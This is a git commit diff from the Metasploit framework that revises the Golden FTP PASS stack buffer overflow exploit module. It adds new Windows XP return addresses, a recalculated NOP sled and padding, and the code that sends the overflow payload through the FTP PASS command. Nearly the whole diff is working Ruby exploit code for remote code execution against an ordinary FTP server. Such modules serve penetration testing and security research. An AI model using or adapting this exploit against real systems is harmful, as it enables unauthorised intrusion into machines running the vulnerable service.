Updated metadata, merged code with #4923. Thx Joff.

git-svn-id: file:///home/svn/framework3/trunk@13211 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Wei Chen 2011-07-18 20:39:27 +00:00
parent 9b72b12050
commit 821e9dd68b
1 changed files with 29 additions and 27 deletions

View File

@ -20,10 +20,17 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info, super(update_info(info,
'Name' => 'GoldenFTP PASS Stack Buffer Overflow', 'Name' => 'GoldenFTP PASS Stack Buffer Overflow',
'Description' => %q{ 'Description' => %q{
This module exploits a vulnerability in the Golden This module exploits a vulnerability in the Golden FTP service, using the PASS
FTP service. This module uses the PASS command to trigger the overflow. command to cause a stack-based buffer overflow. Please note that in order trigger
the vulnerable code, the victim machine must have the "Show new connections" setting
enabled. By default, this option is unchecked.
}, },
'Author' => [ 'bannedit' ], 'Author' =>
[
'Craig Freyman', #Initial poc on exploit-db with iglesiasgg
'bannedit', #Initial msf module
'Joff Thyer <jsthyer[at]gmail.com>', #Improved msf version
],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Version' => '$Revision$', 'Version' => '$Revision$',
'References' => 'References' =>
@ -40,20 +47,15 @@ class Metasploit3 < Msf::Exploit::Remote
'Privileged' => false, 'Privileged' => false,
'Payload' => 'Payload' =>
{ {
'Space' => 350, 'Space' => 440,
'BadChars' => "\x00\x0a\x0d", 'BadChars' => "\x00\x0a\x0d",
}, },
'Platform' => ['win'], 'Platform' => ['win'],
'Targets' => 'Targets' =>
[ [
[ [ 'Windows XP Pro SP3', { 'Ret' => 0x7E45AE4E, } ], #JMP ESI USER32.dll
'Golden FTP 4.70 Universal', # Tested OK - bannedit 05/31/2011 [ 'Windows XP Pro SP2', { 'Ret' => 0x77D4E23B, } ], #JMP ESI USER32.dll
{ [ 'Windows XP Pro SP0/SP1', { 'Ret' => 0x77e8157b, } ] #JMP ESI kernel32.dll
'Platform' => 'win',
'Ret' => 0x00a93ca6,
},
]
], ],
'DisclosureDate' => 'Jan 23 2011')) 'DisclosureDate' => 'Jan 23 2011'))
end end
@ -70,23 +72,23 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit def exploit
if datastore['RHOST'].length < 15 shortjmp = make_nops(3) + "\xeb\x20"
pad = make_nops(1) * (15 - datastore['RHOST'].length) nopsled = make_nops(1) * 60
end srciplen = Rex::Socket.source_address.length
padding = make_nops(1) * (533 - (srciplen + nopsled.length + payload.encoded.length))
sploit = make_nops(4) * 38 sploit = nopsled
sploit << payload.encoded sploit << payload.encoded
sploit << pad unless pad.nil? sploit << padding
sploit << make_nops(1) * (528 - sploit.length)
sploit << [target.ret].pack('V') sploit << [target.ret].pack('V')
print_status("Connecting to #{datastore['RHOST']}:#{datastore['RPORT']}") print_status("Connecting to #{datastore['RHOST']}:#{datastore['RPORT']}")
begin
connect connect
send_user("anonymous") send_user(datastore['FTPUSER'])
send_cmd(['PASS', sploit], false) send_cmd(['PASS', sploit], false)
select(nil,nil,nil,2)
handler handler
rescue EOFError disconnect
end
end end
end end